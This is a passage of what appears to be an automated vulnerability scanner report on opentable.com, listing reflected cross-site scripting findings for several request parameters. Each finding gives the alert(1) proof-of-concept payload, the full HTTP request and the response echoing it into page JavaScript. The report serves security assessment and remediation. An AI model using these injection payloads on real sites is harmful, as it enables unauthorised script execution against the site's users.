Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Set-Cookie: pgseq='; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:58 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
alDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PMa79b6';alert(1)//ef617dd9c1&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
ResultProperties.InResult
...[SNIP]...

3.9. http://www.opentable.com/opentables.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e873'%3balert(1)//c9d78f9b326 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8e873';alert(1)//c9d78f9b326 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod&8e873'%3balert(1)//c9d78f9b326=1 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a05&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2%26d%3d10%252f3%252f2011%2b7%253a00%2bPM%26rtype%3dism_mod%268e873'%253balert(1)%252f%252fc9d78f9b326%3d1&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=100&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=12&vbefreg=12&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref7e62b"><a>b2fae6e1a7a&m=4&cbref=1&restref=200&vbefres=1&vbefreg=1&hp=nuTLw5U0g9aOWgfx%2bJ9Y6g%3d%3d&ts=49&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Set-Cookie: pgseq="; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46366


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
= -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&8e873';alert(1)//c9d78f9b326=1&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2];
ResultProperties.InResults.Neighborhoods = new
...[SNIP]...

3.10. http://www.opentable.com/opentables.aspx [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8520'%3balert(1)//d273cd86d21 was submitted in the p parameter. This input was echoed as e8520';alert(1)//d273cd86d21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2e8520'%3balert(1)//d273cd86d21&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:57 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a57&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41401


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2e8520';alert(1)//d273cd86d21&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...

3.11. http://www.opentable.com/opentables.aspx [restref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the restref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace1b'%3balert(1)//78f95f9005e was submitted in the restref parameter. This input was echoed as ace1b';alert(1)//78f95f9005e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90ace1b'%3balert(1)//78f95f9005e&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a54&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Vary: Accept-Encoding
Content-Length: 44265


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90ace1b';alert(1)//78f95f9005e&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2]
...[SNIP]...

3.12. http://www.opentable.com/opentables.aspx [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e5d7'%3balert(1)//598a6a122be was submitted in the rid parameter. This input was echoed as 2e5d7';alert(1)//598a6a122be in the application's response.

